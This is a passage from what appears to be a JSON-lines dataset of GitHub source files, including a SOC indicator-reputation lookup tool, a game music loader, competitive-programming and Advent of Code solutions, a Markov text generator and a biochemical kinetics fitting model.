valid IP')\n else:\n print(scan_title)\n print('Value does not appear to be a valid IP') \n\n\n\n'''\nThis function will check if string being \npassed is a hash, url, ip, or email.\nThis function will be updated in future versions.\n'''\ndef string_type(query_string):\n \n if len(query_string) >= 32: # check the lenght of the string (32 bits = md5) \n value = \"hash\"\n elif query_string.count('.') == 3 and all(0<=int(num)<256 for num in query_string.rstrip().split('.')):\n value = \"ip\"\n elif '@' in query_string:\n value = \"email\"\n elif query_string == '':\n value = \"empty\"\n elif ('http' in query_string) or ('www.' in query_string) or ('.com' in query_string) or ('.edu' in query_string) or ('.org' in query_string):\n value = \"url\" \n else:\n value = 'I dont know what is this.'\n #print(\"String identified as: \" + value)\n return value\n\n\n\n'''\nFunction to clean IP's and URLs. This is \nimportant in a report to avoid clicking on\nmalicious emails or IP's.\n'''\ndef CleanString(string):\n string = string.replace('.','[.]')\n string = string.replace('https://','hxxps://')\n string = string.replace('http://','hxxp://')\n return string\n\n\n\n'''\nFunction that will manage all the searches.\nThis function utilizes threads to execute the database searches. \nThe order that the databases are printed might vary, since there\nare different threads and they might finish at different times.\n\nIf using a graphical interface, this function opens a new window that will hold the results. \nthis is helpful, since depending on the analyst investigation, it might be required to\nsearch for different strings at the same time, for example: email, ip, domain and hash.\n'''\ndef manager(root,query_string,Virustotal_check,AbuseIPDB_check,Emailrep_check,whois_check): \n results_box = \"\"\n if theArgs.gui:\n window = tk.Toplevel(root)\n window.resizable(False, False)\n window.title('Results')\n \n results_box_label = tk.Label(window, text=\"Results for: \" + CleanString(query_string), font=(\"Helvetica 16 bold\"))\n results_box = tk.scrolledtext.ScrolledText(window, height=50, width=80) # Create the TextBox\n closebtn = tk.Button(window, text='Close', command=lambda: window.destroy(), font=(\"Helvetica 16 bold\"), width=20)\n \n results_box_label.grid(row=0, columnspan=2, padx=5, pady=5)\n results_box.grid(row=1, columnspan=2, padx=5, pady=5)\n closebtn.grid(row=2, columnspan=2, padx=5, pady=5)\n \n window.update()\n \n if query_string == \"\":\n if theArgs.gui:\n results_box.insert(tk.END, 'Search string cannot be empty')\n else:\n print(\"Search string cannot be empty\")\n else:\n if whois_check: \n t = Thread(target=whois_Lookup,args=(query_string, results_box,))\n t.start()\n \n if Virustotal_check:\n t = Thread(target=virustotal,args=(query_string, results_box,))\n t.start()\n \n if AbuseIPDB_check:\n t = Thread(target=abuseipdb,args=(query_string, results_box,))\n t.start() \n \n if Emailrep_check:\n t = Thread(target=emailrep,args=(query_string, results_box,))\n t.start()\n \n if (whois_check == False) and (Virustotal_check == False) and (AbuseIPDB_check == False) and (Emailrep_check == False) :\n if theArgs.gui:\n results_box.insert(tk.END, '\\nPlease select at least one Database')\n else:\n print('Please select at least one Database') \n\n \n'''\nThis is the about menu for the graphical interface.\n''' \ndef menuAbout():\n messagebox.showinfo(\"About\", about)\n messagebox.Dialog\n\n\n\n'''\nThis is the how_to menu for the graphical interface.\n''' \ndef menuHow_To():\n 
messagebox.showinfo(\"How To\", how_to + test_strings)\n messagebox.Dialog\n\n\n\n'''\nGraphical Interface\nThis is a quick graphical interface. It contains a input string box, \ndatabase check boxes and a button to perform the search. when the search\nstarts, it opens a new window that will hold all the results from the search.\n'''\ndef graphicalInterface():\n root = tk.Tk()\n root.title(\"CYBV 473 Final\")\n root.resizable(False, False)\n menuBar = tk.Menu(root)\n toolsMenu = tk.Menu(menuBar, tearoff=0)\n \n \n toolsMenu.add_command(label='About Search', command=menuAbout, underline=0)\n toolsMenu.add_command(label='How To', command=menuHow_To, underline=0)\n toolsMenu.add_separator()\n toolsMenu.add_command(label='Exit', command=root.destroy)\n menuBar.add_cascade(label='Help', menu=toolsMenu, underline=0) \n root.config(menu=menuBar) # menu ends\n \n search_Label = tk.Label(root, text=\"URL, IP, hash or email:\", font=(\"Helvetica 16 bold\"))\n search_String = tk.Entry(root,font=(\"Helvetica 16 bold\"))\n search_Button = tk.Button(root, text='search', command=lambda: manager(root,search_String.get(),Virustotal_check.get(),AbuseIPDB_check.get(),Emailrep_check.get(),whois_check.get()),font=(\"Helvetica 16 bold\"))\n \n # create the checkboxes\n Virustotal_check = tk.BooleanVar() \n Virustotal = tk.Checkbutton(root, text=\"Virustotal\", variable=Virustotal_check)\n \n AbuseIPDB_check = tk.BooleanVar() \n AbuseIPDB = tk.Checkbutton(root, text=\"AbuseIPDB\", variable=AbuseIPDB_check)\n \n Emailrep_check = tk.BooleanVar() \n Emailrep = tk.Checkbutton(root, text=\"Emailrep\", variable=Emailrep_check)\n \n whois_check= tk.BooleanVar() \n whois = tk.Checkbutton(root, text=\"who.is\", variable=whois_check)\n \n search_Label.grid(row=0, columnspan=2, padx=5, pady=5)\n search_String.grid(row=1, columnspan=2, padx=5, pady=5)\n\n Virustotal.grid(row=2, column=0, padx=5, pady=5,sticky=tk.W)\n AbuseIPDB.grid(row=2, column=1, padx=5, pady=5,sticky=tk.W)\n Emailrep.grid(row=3, column=1, padx=5, pady=5,sticky=tk.W)\n whois.grid(row=3, column=0, padx=5, pady=5,sticky=tk.W)\n search_Button.grid(row=5, columnspan=2, padx=5, pady=5) \n \n if theArgs.query:\n search_String.insert(tk.END, theArgs.query)\n tk.mainloop()\n \n\n'''\nMain Function:\n''' \n\nhow_to='This tool checks for hash, ip, url or email reputation.\\n Usage:\\n GUI: \\npython3 SOC_analysis.py -g |\\n CLI: \\npython3 SOC_analysis.py -e whois,virustotal -q www.facebook.com'\n\nparser = argparse.ArgumentParser(description=how_to)\nparser.add_argument('-g', '--gui', help='Use graphical interface', action='store_true')\nparser.add_argument('-e', '--engine', help='Select a search engine (whois, virustotal, abuseipdb or emailrep)')\nparser.add_argument('-q', '--query', help='This needs to be a valid Hash, email, url or IP.')\n\ntheArgs = parser.parse_args()\n \nif theArgs.gui:\n graphicalInterface()\n \nelif theArgs.query:\n if theArgs.engine: \n # manager(root,query_string,Virustotal_check,AbuseIPDB_check,Emailrep_check,whois_check): \n virustotal_temp = False\n abuseipdb_temp = False\n emailrep_temp = False\n whois_temp = False\n \n if 'virustotal' in theArgs.engine:\n virustotal_temp = True\n if 'whois' in theArgs.engine:\n whois_temp = True\n if 'abuseipdb' in theArgs.engine:\n abuseipdb_temp = True\n if 'emailrep' in theArgs.engine:\n emailrep_temp = True\n \n manager(False,theArgs.query,virustotal_temp,abuseipdb_temp,emailrep_temp,whois_temp)\n\n else:\n parser.print_help()\n\nelif theArgs.engine:\n parser.print_help()\n\nelse: \n 
parser.print_help()\n\n","repo_name":"xhaabx/SOC-Investigate","sub_path":"Final_Analysis.py","file_name":"Final_Analysis.py","file_ext":"py","file_size_in_byte":33285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20130134883","text":"# NOTE: This file is the location for music assets, instead of asstes.py\n# This decision was made in order to reduce clutter in assets.py\n\n\nimport logging\nimport random\nimport os\n\nimport pygame.mixer\n\nfrom tank_game import global_vars, config\n\n\nhave_music = config.ENABLE_MUSIC\n\nif global_vars.use_sound:\n logging.info('Loading music...')\n try:\n\n songs = [\n ('music/Dream_Sweet_in_Sea_Major.ogg', 0.25),\n ('music/The_undergrounds_1.ogg', 0.25),\n ]\n\n toremove = []\n for (song, volume) in songs:\n if not os.path.exists(song):\n logging.warning(f'Music file \"{song}\" does not exist, removing from playlist')\n toremove.append((song, volume))\n else:\n try:\n pygame.mixer.music.load(song)\n except Exception:\n logging.warning(f'Music file \"{song}\" unable to be loaded, removing from playlist', exc_info=True)\n toremove.append((song, volume))\n for rem in toremove:\n songs.remove(rem)\n\n if not songs:\n logging.warning('All songs failed to load! Disabled music for game')\n have_music = False\n\n def play_random_song():\n song, volume = random.choice(songs)\n logging.debug(f'Playing song \"{song}\" at volume {volume}...')\n pygame.mixer.music.load(song)\n pygame.mixer.music.set_volume(volume)\n pygame.mixer.music.play(fade_ms=500)\n\n def stop_music():\n pygame.mixer.music.fadeout(500)\n logging.debug('Stopped music')\n\n except Exception:\n have_music = False\n logging.warning('Error while loading music', exc_info=True)\nelse:\n have_music = False\n\n\nif have_music:\n logging.info('Music loaded!')\nelse:\n logging.warning('Music was unable to be loaded, generating stub functions')\n\n def play_random_song():\n pass\n\n def stop_music():\n pass\n","repo_name":"Gaming32/Tank-Game","sub_path":"tank_game/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23543656054","text":"def element(queries):\n l = int(queries[0])\n r = int(queries[1])\n d = int(queries[2])\n \n if d < l or d > r:\n return d\n else:\n return (r//d + 1)*d\n\nsize = int(input())\n\nfor i in range(size):\n queries = input().split()\n elem = str(element(queries))\n print(elem)\n","repo_name":"sheyslong/codeforces","sub_path":"List 1/B - minimum-integer.py","file_name":"B - minimum-integer.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33320404685","text":"# Напишите программу для проверки истинности утверждения \n# ¬(X ⋁ Y ⋁ Z) = ¬X ⋀ ¬Y ⋀ ¬Z для всех значений предикат.\n\nprint('Проверям истинность выражения ¬(X ⋁ Y ⋁ Z) = ¬X ⋀ ¬Y ⋀ ¬Z при всех значениях:')\nfor i in range (2):\n X = True\n if i == 1:\n X = False\n for j in range (2):\n Y = True\n if j == 1:\n Y = False\n for d in range (2):\n Z = True\n if d == 1:\n Z = False\n print(f'X = {X}, Y = {Y}, Z = {Z}, то истинность выражения = {not(X or Y or Z) == (not X and not Y and not 
Z)}')\n","repo_name":"milawinner/tasksandprograms","sub_path":"Python/PythonSeminars/Hometask01/hometask2.py","file_name":"hometask2.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12914901282","text":"import markovify\nfrom corpus import Corpus\nimport re\nimport time\n\n\ndef get_training_text(corpus, from_paragraph, to_paragraph):\n \"\"\"\n This method takes a corpus object as parameter and extracts the sentences from the speeches in the corpus\n that will be used for training\n :param corpus:\n :param from_paragraph:\n :param to_paragraph:\n :return: training_text\n \"\"\"\n training_text = \"\"\n opening_par = []\n for key, speech in corpus.speeches.items():\n opening_par.append(speech.par[from_paragraph:to_paragraph])\n for par in opening_par:\n for sent in par:\n for chain in sent:\n clean_chain = [element for element in chain if element != u'\\u200b']\n clean_sentence = \" \".join(clean_chain)\n clean_sentence = re.sub(r' ([,:;\\.])',r'\\1', clean_sentence)\n training_text = clean_sentence + \" \" + training_text\n return training_text\n\ndef get_markovian_text(training_text, n):\n \"\"\"\n This method takes the training text and creates a concatenation of short and long automatically generated\n sentences in order to create a speech. The number of short and long alternations is parameter n.\n :param training_text:\n :param n:\n :return: markovian speech\n \"\"\"\n text_model = markovify.Text(training_text)\n my_string = \"\"\n for n in range(n):\n my_string = text_model.make_short_sentence(140, tries=200) + \" \" + text_model.make_sentence(tries=200) + \" \" + my_string\n return my_string\n\ndef save(markovian_speech):\n \"\"\"\n Saves the created speech inside the markovian_speeches folder\n :param markovian_speech:\n \"\"\"\n my_file = open('./markovian_speeches/speech' + \"_\" + str(time.time()) + '.txt', 'w', encoding='utf-8')\n my_file.write(markovian_speech)\n my_file.close()\n\nif __name__ == '__main__':\n \"\"\"\n This main method creates a corpus object with all the speeches. 
\n It then trains:\n - opening sentences using only the first two paragraphs.\n - body sentences using paragraphs from the second paragraph until the forth to last\n - ending sentences using four final paragraphs\n \n The automatic speech is then generated with the training material and saved as a file in the markovian_speeches folder.\n \"\"\"\n corpus = Corpus([])\n training_opening = get_training_text(corpus, 0, 2)\n training_body = get_training_text(corpus, 2, -4)\n training_end = get_training_text(corpus, -4, -1)\n\n markovian_speech = get_markovian_text(training_opening , 2) + \"\\n\\n\" + get_markovian_text(training_body , 6) + \"\\n\\n\" + get_markovian_text(training_end , 3)\n\n save(markovian_speech)\n\n\n\n","repo_name":"lirondos/orgulloysatisfaccion","sub_path":"markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"71093611361","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom scipy.integrate import solve_ivp\nfrom scipy.optimize import root\n\nclass DistributiveDeadenylation():\n\n def __init__(self, fret_experiment):\n\n self.time = fret_experiment.time\n self.rna = fret_experiment.rna\n self.enzyme = fret_experiment.enzyme\n self.n = fret_experiment.n\n self.species_list()\n\n def species_list(self):\n\n species = ['E*','E'] # Binding incompetent and competent enzyme\n for x in range(1,self.n+1):\n species.append(f\"ETA{x}\") # RNA bound enzyme\n for x in range(1,self.n+1): # Must use a second loop because species is list not dict so order matters\n species.append(f\"TA{x}\") # Free RNA\n species.append('A1') # Free AMP arising from deadenylation\n self.species = species\n\n def setup_concentrations(self):\n\n self.concentrations = {}\n for specie in self.species:\n self.concentrations[specie] = []\n\n def initial_concentration_guesses(self, enzyme, rna, k1, km1, n):\n ## Make list of t=0 concentrations of enzyme and substrate.\n ## Should be all free enzyme, all full-length and free RNA substrate\n ## because no binding or cleavage has occurred yet.\n\n C0 = []\n C0.append((1/(1+(k1/km1)))*enzyme) # E*, initial guess is equilibrium concentration from E* <-> E with no added RNA\n C0.append(((k1/km1)/(1+(k1/km1)))*enzyme) # E\n for x in range(1,n+1): # ETAi, initially no bound complex\n C0.append(0)\n for x in range(1,n+1):\n if x == n: # TAi\n C0.append(rna) # Last element, initially all RNA is max length\n else:\n C0.append(0) # All other lengths are initially zero conc\n C0.append(0) # A1, initially zero\n\n self.C0 = C0\n\n @staticmethod\n def relaxation_matrix(C0, k1, km1, k2, km2, kcat, n):\n ## Relaxation matrix for nuclease activity, assumes just up to 3mer polyA strand length here as an example (n=3).\n ## Assumes that enzyme falls off RNA strand after catalysis and rebinds product to catalyze again,\n ## i.e. the enzyme is fully distributive. Also assumes that enzyme cannot catalyze anything below \n ## TA2 in length, i.e. once only 1 A is left, the enzyme cannot continue remove bases from the rest \n ## of the strand. 
This matrix can be extended for arbitrary length RNA, using the parameter n to set\n ## the initial RNA length prior to cleavage by the enzyme.\n\n ## d/dt C(t) = R * C(t)\n\n ## [E*] [-k1 k-1 0 0 0 0 0 0 0 ] [E*]\n ## [E] [k1 -k-1 k-2 k-2+kcat k-2+kcat -k2[E] -k2[E] -k2[E] 0 ] [E]\n ## d/dt [TEA1] = [0 0 -k-2 0 0 k2[E] 0 0 0 ] [TEA1]\n ## [TEA2] [0 0 0 -k-2-kcat 0 0 k2[E] 0 0 ] [TEA2]\n ## [TEA3] [0 0 0 0 -k-2-kcat 0 0 k2[E] 0 ] [TEA3]\n ## [TA1] [0 0 k-2 kcat 0 -k2[E] 0 0 0 ] [TA1]\n ## [TA2] [0 0 0 k-2 kcat 0 -k2[E] 0 0 ] [TA2]\n ## [TA3] [0 0 0 0 k-2 0 0 -k2[E] 0 ] [TA3]\n ## [A1] [0 0 0 kcat kcat 0 0 0 0 ] [A1] \n\n ## There are a total of 2*n + 3 species, so for the relaxation matrix R there are \n ## 2*n + 3 rows and columns, e.g. 1 E*, 1 E, 1 A1, n ETAi, and n TAi = 2*n + 3 total species.\n\n R = []\n R.append([-k1, km1] + [0]*n + [0]*n + [0]) # E*\n R.append([k1, -km1] + [km2] + [km2+kcat]*(n-1) + [-k2*C0[1]]*n + [0]) # E\n R.append([0]*2 + [-km2] + [0]*(n - 1) + [k2*C0[1]] + [0]*(n - 1) + [0]) # ETA1\n for y in range(2, n + 1): # ETA2 to ETAn\n R.append([0]*(y + 1) + [-km2-kcat] + [0]*(n - y) + [0]*(y - 1) + [k2*C0[1]] + [0]*(n - y) + [0])\n R.append([0]*2 + [km2] + [kcat] + [0]*(n - 2) + [-k2*C0[1]] + [0]*(n - 1) + [0]) # TA1\n for y in range(2, n): # TA2 to TAn-1\n R.append([0]*(y + 1) + [km2] + [kcat] + [0]*(n - 2) + [-k2*C0[1]] + [0]*(n - y) + [0])\n R.append([0]*2 + [0]*(n - 1) + [km2] + [0]*(n - 1) + [-k2*C0[1]] + [0]) # TAn\n R.append([0]*2 + [0] + [kcat]*(n - 1) + [0]*n + [0]) # A1\n\n return R\n\n def extract_solved_concentrations(self, solver_result):\n\n self.concentrations['E*'].append(solver_result.y[0])\n self.concentrations['E'].append(solver_result.y[1])\n for x in range(1,self.n+1): # Don't have to use two for loops because concentrations is dict not list\n self.concentrations[f\"ETA{x}\"].append(solver_result.y[x+1]) # x+1 to move past E* and E, ETAi are before TAi\n self.concentrations[f\"TA{x}\"].append(solver_result.y[x+self.n+1]) # x+n+1 because ETAi and TAi are separated by n indices\n self.concentrations['A1'].append(solver_result.y[-1]) # A1 is last\n \n def calculate_total_rna_concentrations(self):\n\n self.total_rna_concentrations = {k:[] for k in self.concentrations.keys() if 'E' not in k}\n for i, v in enumerate(self.enzyme):\n for j in range(1, self.n+1):\n self.total_rna_concentrations[f'TA{j}'].append(self.concentrations[f'TA{j}'][i] + self.concentrations[f'ETA{j}'][i]) # TAi,T = [TAi] + [ETAi]\n self.total_rna_concentrations['A1'].append(self.concentrations['A1'][i]) # TAi,T = [TAi] + [ETAi]\n\n def simulate_kinetics(self, params):\n ## Run numerical integration of rate equations for a given kinetic model from t=0, returns Ci(t)\n ## Needs initial guesses for concentrations of each species at t=0\n\n k1 = params['k1'].value\n km1 = params['km1'].value\n k2 = params['k2'].value\n km2 = params['km2'].value\n kcat = params['kcat'].value\n\n self.setup_concentrations()\n for i, v in enumerate(self.enzyme):\n if self.enzyme[i] == 0: # No enzyme means nothing happens, all RNA is full length at all times\n self.concentrations[f'E*'].append([0 for x in range(len(self.time[i]))])\n self.concentrations[f'E'].append([0 for x in range(len(self.time[i]))])\n self.concentrations[f'A1'].append([0 for x in range(len(self.time[i]))])\n\n for l in range(1, self.n+1):\n if l == self.n:\n self.concentrations[f'TA{self.n}'].append([self.rna for x in range(len(self.time[i]))])\n self.concentrations[f'ETA{self.n}'].append([0 for x in range(len(self.time[i]))])\n else:\n 
self.concentrations[f'TA{l}'].append([0 for x in range(len(self.time[i]))])\n self.concentrations[f'ETA{l}'].append([0 for x in range(len(self.time[i]))])\n\n else:\n self.initial_concentration_guesses(self.enzyme[i], self.rna, k1, km1, self.n)\n param_args = {'k1':k1, 'km1':km1, 'k2':k2, 'km2':km2, 'kcat':kcat, 'n':self.n}\n time_span = (self.time[i][0],self.time[i][-1])\n initial_concs = self.C0\n rate_func = self.relaxation_matrix\n t_return = np.array(self.time[i])\n solver_result = solve_ivp(propagator,time_span,initial_concs,t_eval=t_return,method='BDF',first_step=1e-12,atol=1e-12,args=(rate_func, param_args))\n self.extract_solved_concentrations(solver_result)\n\nclass DuplexHybridization:\n\n def __init__(self, fret_experiment):\n\n self.experimental_fret = fret_experiment.fret # Needed for solving baseline params with Ax = B\n self.fret_error = fret_experiment.fret_error\n self.dGo = fret_experiment.dGo\n self.alpha = fret_experiment.alpha\n self.n = fret_experiment.n\n self.temperature = fret_experiment.temperature\n self.time = fret_experiment.time\n self.QT = fret_experiment.QT\n self.enzyme = fret_experiment.enzyme\n self.rna = fret_experiment.rna\n self.species_list()\n self.initial_concentration_guesses()\n self.calculate_kq()\n\n def species_list(self):\n\n species = []\n for x in range(1,self.n+1):\n species.append(f'TA{x}') # Free RNA\n for x in range(1,self.n+1):\n species.append(f'TA{x}Q') # RNA hybridized to DNA quencher strand\n species.append('Q') # Free quencher strand\n self.species = species\n\n def setup_concentrations(self):\n\n self.concentrations = {}\n for specie in self.species:\n self.concentrations[specie] = [[] for concentration in self.enzyme]\n \n self.annealed_fraction =[[] for x in self.enzyme]\n\n def initial_concentration_guesses(self):\n \n self.C0= []\n for x in range(self.n):\n self.C0.append(1e-7) # [TAi], free RNA\n for x in range(self.n):\n self.C0.append(1e-7) # [TAiQ], RNA annealed to DNA quencher strand\n self.C0.append(self.QT) # [Q], free DNA quencher\n\n def get_total_rna_concentrations(self, prior_to_hybridization_concentrations):\n\n self.total_concentrations = [prior_to_hybridization_concentrations[f'TA{x}'] + prior_to_hybridization_concentrations[f'ETA{x}'] for x in range(1,self.n+1)] # TAi,T = [TAi] + [ETAi]\n\n def calculate_kq(self):\n\n i = np.array([I for I in np.arange(1,self.n+1)])\n dG = self.dGo + self.alpha*i # dG for forming hybrid RNA:DNA duplex as function of RNA length\n R = 8.3145e-3 # units of kJ/mol for dG, change to 1.987e-3 if you like kcal/mol but then also need to change dGo and alpha inputs to kcal/mol\n self.KQ = np.exp(-dG/(R*self.temperature))\n\n @staticmethod\n def hybrid_duplex_equations(C0, n, QT, TAiT, KQ):\n ## This takes the concentrations of each RNA species at each time point and calculates how much\n ## of each becomes annealed to the capture strand Q according to the affinity constant KQ.\n ## Essentially, this calculates the concentrations of a series of hybrid duplexes over time,\n ## once the deadenylation reaction is quenched and capture strand is added to probe the FRET value.\n\n eqs = []\n eqs.append(-QT + np.sum(C0[n:])) # 0 = -QT + [Q] + [TA1Q] + ... 
+ [TAnQ], mass conservation DNA quencher\n for x in range(n):\n eqs.append(-TAiT[x] + C0[x] + C0[x+n]) # 0 = -TAiT + [TAi] + [TAiQ], mass conservation each RNA length\n for x in range(n):\n eqs.append(KQ[x]*C0[x]*C0[-1] - C0[x+n]) # KQi*[TAi]*[Q] - [TAiQ] = 0, affinity constant of each hybrid duplex\n\n return eqs\n\n def extract_solved_concentrations(self, solver_result, ei):\n\n for index, value in enumerate(self.concentrations.keys()):\n self.concentrations[value][ei].append(solver_result.x[index])\n\n def generate_baseline_matrix(self):\n\n self.baseline_matrix =[[] for x in self.enzyme]\n for i, v in enumerate(self.enzyme):\n for fraction in self.annealed_fraction[i]:\n self.baseline_matrix[i].append([fraction, 1])\n\n def solve_fret_baseline_params(self):\n # Baseline parameters are solved according to Ax = B, where A is a matrix with rows = [Pi, 1], and Pi is the ith annealed fraction time point 1 is a factor accounting for the baseline offset.\n # B is the experimental FRET data vector for a given enzyme concentration, and x is a vector of baseline parameters for that enzyme concentration, i.e. dF and F. Each enzyme conc has a unique dF and F.\n # The result of Ax = B maps the simulated hybridized RNA populations onto the experimental data using the optimal baseline parameters in x.\n\n self.baseline_params =[[] for x in self.enzyme]\n for i, v in enumerate(self.enzyme):\n baseline_solutions = np.linalg.lstsq(self.baseline_matrix[i][1:], self.experimental_fret[i][1:], rcond=None) # Don't use time zero dummy point for calculating baselines\n self.baseline_params[i].append([baseline_solutions[0][0]])\n self.baseline_params[i].append([baseline_solutions[0][1]])\n\n def calculate_fret(self):\n ## FRET curve starts high and ends low as full length RNA is converted to\n ## shorter RNA products which have weaker affinities for the capture strand\n ## denoted by Q, thus they cannot form stable hybrid RNA:DNA duplexes that\n ## would otherwise give rise to high FRET due to the proximity of the donor\n ## and acceptor dyes.\n\n self.fret = [[] for x in self.enzyme]\n for i, v in enumerate(self.enzyme):\n fret_column_vector = np.matmul(self.baseline_matrix[i][1:], self.baseline_params[i]) # Don't use time zero dummy point for calculating simulated FRET\n self.fret[i] = np.ravel(np.reshape(fret_column_vector, (1, len(fret_column_vector))))\n self.fret[i] = np.insert(self.fret[i], 0, 0) # Put time zero dummy point back in to make simulated FRET the same length as the experimental\n\n def normalize_fret(self): # Normalize FRET profiles to run from 1 to 0\n\n self.normalized_experimental_fret = []\n self.normalized_fret = []\n self.normalized_fret_error = []\n for i, v in enumerate(self.enzyme):\n self.normalized_fret.append((self.fret[i] - self.baseline_params[i][1])/self.baseline_params[i][0])\n self.normalized_experimental_fret.append((self.experimental_fret[i] - self.baseline_params[i][1])/self.baseline_params[i][0])\n self.normalized_fret_error.append(np.sqrt((self.fret_error[i]/self.baseline_params[i][0])**2))\n\n def simulate_hybridization(self, kinetic_model):\n ## Solve for concentrations of free and hybridized RNA after stopping reaction and adding quencher DNA strand\n ## Needs initial guesses for concentrations as in the kinetic part\n\n self.setup_concentrations()\n for i, v in enumerate(kinetic_model.enzyme):\n for z,t in enumerate(kinetic_model.time[i]):\n self.get_total_rna_concentrations({k:kinetic_model.concentrations[k][i][z] for k in kinetic_model.concentrations.keys()})\n 
solver_result = root(self.hybrid_duplex_equations, self.C0, args=(self.n, self.QT, self.total_concentrations, self.KQ), method='lm')\n self.extract_solved_concentrations(solver_result, i) # Need enzyme index to extend concentration list for each enzyme concentration\n self.annealed_fraction[i].append(np.sum([self.concentrations[k][i][z]/self.rna for k in self.concentrations if ('Q' in k) & (k[0] != 'Q')])) # Want everything annealed to Q, i.e. TAiQ, but not free Q\n\ndef propagator(t, C, func, constants): # Used in scipy.integrate.solve_ivp, general propagation function for use by kinetic model objects\n\n R = func(C, **constants) # Make relaxation matrix\n\n return np.matmul(R,C) # Calculates concentration fluxes, d/dt C\n\ndef generate_model_objects(fret_experiment, fit_model):\n\n if fit_model == 'Distributive':\n kinetic_model = DistributiveDeadenylation(fret_experiment)\n \n hybridization_model = DuplexHybridization(fret_experiment)\n\n return kinetic_model, hybridization_model\n\ndef simulate_full_model(params, kinetic_model, hybridization_model):\n\n kinetic_model.simulate_kinetics(params)\n hybridization_model.simulate_hybridization(kinetic_model)\n hybridization_model.generate_baseline_matrix()\n hybridization_model.solve_fret_baseline_params()\n hybridization_model.calculate_fret()\n\n return kinetic_model, hybridization_model\n\ndef calculate_residuals_simulate_best_fit_data(fret_expts, opt_params, config_params, residuals):\n # Calculate fit residuals and simulate data over finely sampled experimental temperature range to generate smooth best fit data and population plots\n \n from copy import deepcopy\n best_kin_models = []\n best_hybr_models = []\n resid = []\n normalized_resid = []\n for i, fret_expt in enumerate(fret_expts):\n kinetic_model, hybridization_model = generate_model_objects(fret_expt, config_params['Modeling parameters']['Kinetic model'])\n kinetic_model, hybridization_model = simulate_full_model(opt_params[i], kinetic_model, hybridization_model)\n hybridization_model.normalize_fret()\n resid.append(residuals(fret_expt.fret, hybridization_model.fret))\n normalized_resid.append(residuals(hybridization_model.normalized_experimental_fret, hybridization_model.normalized_fret))\n\n max_time = max(np.array([max(time_vector) for time_vector in fret_expt.time])) # Re-simulate with finely sampled experimental time vectors\n sim_time = [np.linspace(0, max_time, 300) for time_vector in fret_expt.time]\n sim_fret_expt = deepcopy(fret_expt)\n sim_fret_expt.time = sim_time\n sim_kinetic_model, sim_hybridization_model = generate_model_objects(sim_fret_expt, config_params['Modeling parameters']['Kinetic model'])\n sim_kinetic_model.simulate_kinetics(opt_params[i])\n sim_hybridization_model.simulate_hybridization(sim_kinetic_model)\n sim_hybridization_model.baseline_params = hybridization_model.baseline_params # Copy best baseline params for simulating best fit data\n sim_hybridization_model.generate_baseline_matrix() # Don't recalculate baseline params because this was already done above with the optimal params and copied, just make new baseline matrix\n sim_hybridization_model.calculate_fret()\n sim_hybridization_model.normalize_fret()\n\n best_kin_models.append(sim_kinetic_model)\n best_hybr_models.append(sim_hybridization_model)\n\n return resid, normalized_resid, best_kin_models, 
best_hybr_models\n","repo_name":"robharkness/deadenylationkinetics","sub_path":"src/analysis/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":17805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34535967266","text":"import re\n\ndata = open(\"Day22.txt\", \"r\").read().split(\"\\n\")[2:]\nnodes = {}\n\nfor line in data:\n\tx, y, space, used = map(int, re.match(r\"/dev/grid/node-x(\\d+)-y(\\d+)\\s+(\\d+)T\\s+(\\d+)T\\s+(?:\\d+)T\\s+(?:\\d+)%\", line).groups())\n\tnodes[(x, y)] = (space, used)\n\ntotal = 0\nfor p1 in nodes:\n\tfor p2 in nodes:\n\t\tif p1 != p2 and 0 < nodes[p1][1] <= (nodes[p2][0] - nodes[p2][1]):\n\t\t\ttotal += 1\n\nmax_x = max(k[0] for k in nodes)\nmax_y = max(k[1] for k in nodes)\ndims = (max_x + 1, max_y + 1)\n\nprint(total)\n\nspace = []\nused = []\nfor y in range(dims[1]):\n\tspace_row = []\n\tused_row = []\n\tfor x in range(dims[0]):\n\t\tspace_row.append(nodes[(x, y)][0])\n\t\tused_row.append(nodes[(x, y)][1])\n\tspace.append(space_row)\n\tused.append(used_row)\n\nspace = tuple(map(tuple, space))\nused = tuple(map(tuple, used))\n\nzero = None\nfor x in range(dims[0]):\n\tfor y in range(dims[1]):\n\t\tif used[y][x] == 0:\n\t\t\tzero = (x, y)\n\t\t\tbreak\n\ntarget = (0, 0)\ntarget_data = (max_x, 0)\n\ndirs = ((-1, 0), (1, 0), (0, -1), (0, 1))\n\nfor y in range(dims[1]):\n\tfor x in range(dims[0]):\n\t\tprint(\" {}/{} \".format(used[y][x], space[y][x]), end=\"\")\n\tprint()\n\n\n","repo_name":"kevinmchung/AdventOfCode","sub_path":"2016/Day22/Day22.py","file_name":"Day22.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34779285836","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom functools import wraps\nfrom importlib import import_module\n\n\nfrom django.db.models.fields.related import ForeignKey\nForeignKey.__dump__ = lambda self: 'ForeignKey(%s.%s -> %s.%s)' % (self.model, self.attname, self.rel.to, self.rel.field_name)\n\nfrom django.db.models.sql.where import Constraint\nConstraint.__dump__ = lambda self: 'Constraint(%s.%s)' % (self.alias, self.col)\n\n\ndef obj_dump(obj, indent=0, seen=None):\n if seen is None:\n seen = set()\n result = []\n if obj is None or isinstance(obj, (str, int, long, float, bool, dict, set, datetime)) or callable(obj):\n result.append(repr(obj))\n elif isinstance(obj, unicode):\n result.append(\"u'\" + obj.encode('utf8') + \"'\")\n elif isinstance(obj, (list, tuple)) and not obj:\n result.append(repr(obj))\n elif hasattr(obj, 